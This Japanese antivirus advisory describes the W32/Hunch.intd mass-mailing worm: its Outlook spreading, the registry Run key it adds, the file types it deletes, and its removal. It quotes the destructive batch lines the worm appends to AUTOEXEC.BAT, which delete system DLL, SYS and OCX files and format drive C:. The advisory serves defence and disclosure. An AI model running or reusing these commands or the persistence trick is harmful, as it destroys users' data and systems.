ウイルス情報

ウイルス名 危険度

W32/Hunch.intd

企業ユーザ: 低
個人ユーザ: 低
種別 ウイルス
最小定義ファイル
(最初に検出を確認したバージョン)
4222
対応定義ファイル
(現在必要とされるバージョン)
4241 (現在7628)
対応エンジン 5.1.00以降 (現在5600) 
エンジンバージョンの見分け方
別名 I-Worm.Vanero.b (AVP), W32.Hunch.I@mm (NAV)
情報掲載日 02/09/24
発見日(米国日付) 02/09/05
駆除補足 ウイルス駆除のヒント
概要 ウイルスの特徴 感染症状 感染方法 駆除方法

概要

TOPへ戻る

ウイルスの特徴



  • この亜種は、テスト時にはバグがあったため、送信メールに自身を添付することができませんでした。電子メールは Outlook のアドレス帳に登録されているすべての宛先に送信されましたが、ファイルは添付されませんでした。
  • このウイルスは、ターゲット マシンで実行されると、次のことを行います。
    • ポルノ画像を表示します(W32/Hunch.C@MM と同様)。
    • (次回のシステム起動時に自身が実行されるように)次のレジストリ キーを追加します。

      HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"COLAS" = %WinDir%\System\COLAS.EXE

      ただし、テスト時には、%WinDir%\System\COLAS.EXE に自身をコピーできなかったため、このシステム起動時のフックは無効でした。

    • Outlook のアドレス帳に登録されているすべての宛先に自身を送信しようとします。テスト時には、送信メッセージにファイルは添付されませんでした。
      件名(なし)
      添付ファイル(なし)
      本文Tal como te prometi; te envio mi foto enel archivo adjunto...
    • すべてのドライブを検索して、次の拡張子のいずれかを持つファイルを探し、見つかると(最大5個のファイルを)削除します。

      XLS、DOC、WAV、DWG、MP3、BAK、CDX、BMP、HTM、HLP、CHM、JPG、TGA、CPL、ACD、MID、CDR、MDB、DBF、ICO

    • 削除したファイルのログを %WinDir%\System\MyWife!.scr に書き込みます。

      例:
      ARCHIVOS
      dd/mm/yy hh:mm:ss C:\WINDOWS\1STBOOT.BMP
      dd/mm/yy hh:mm:ss C:\WINDOWS\CIRCLES.BMP
      dd/mm/yy hh:mm:ss C:\WINDOWS\FOREST.BMP
      dd/mm/yy hh:mm:ss C:\WINDOWS\METAL LINKS.BMP
      dd/mm/yy hh:mm:ss C:\WINDOWS\PINSTRIPE.BMP

    • 次回のシステム起動時にファイル削除とドライブのフォーマットを行う発病ルーチンが起動するように、下記の行を C:\AUTOEXEC.BAT に付加します。

      @echo off
      DEL C:\WINDOWS\SYSTEM\*.SYS
      DEL C:\WINDOWS\SYSTEM\*.DLL
      DEL C:\WINDOWS\SYSTEM\*.OCX
      CLS
      FORMAT c: /u /v:COLAS /autotest
      CLS

TOPへ戻る

以下の症状が見られる場合、このウイルスに感染している可能性があります。

  • %WinDir%\System\MyWife!.scr が存在する。
  • 上記のレジストリ フックが存在する。

TOPへ戻る

感染方法

  • このウイルスは、実行されると、Microsoft Outlook のアドレス帳に登録されているすべての宛先に自身を送信しようとする。テストでは、このルーチンにはバグがあり、送信メッセージに添付ファイルは含まれなかった。

TOPへ戻る

駆除方法

■指定のエンジンとウイルス定義ファイルを使用して、検出して下さい。検出されたすべてのファイルを削除してください。

Windows ME/XPでの駆除についての補足

TOPへ戻る